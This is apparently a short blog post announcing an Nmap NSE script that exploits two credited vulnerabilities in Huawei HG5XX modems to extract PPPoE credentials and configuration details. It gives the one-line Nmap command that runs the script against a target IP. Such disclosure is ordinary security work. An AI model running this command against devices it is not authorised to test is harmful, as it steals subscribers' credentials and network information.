Remote credential and configuration disclosure of Huawei HG5XX devices using Nmap.
I have added a NSE script called "http-huawei-hg5xx-vuln" which exploits a couple of vulnerabilities found in Huawei HG5XX modems.
The first vulnerability which allows an attacker to extract the router's configuration file, was found by Pedro Joaquín of Websec. The second vulnerability lets the attacker extract the PPPoE password and was reported by ADiaz.
The information extracted by "http-huawei-hg5xx-vuln" is:
- PPPoE credentials
- Firmware version
- Gateway IP
- DNS 1 and 2
- Network segment
- Active Ethernet and WiFi connections
To obtain the Huawei HG5XX's PPPoE credentials and configuration file with Nmap we can use the following command:
$nmap -p80 --script http-huawei-hg5xx-vuln <IP>
If the device is vulnerable:
Here you can see a video demonstrating "http-huawei-hg5xx-vuln" in action: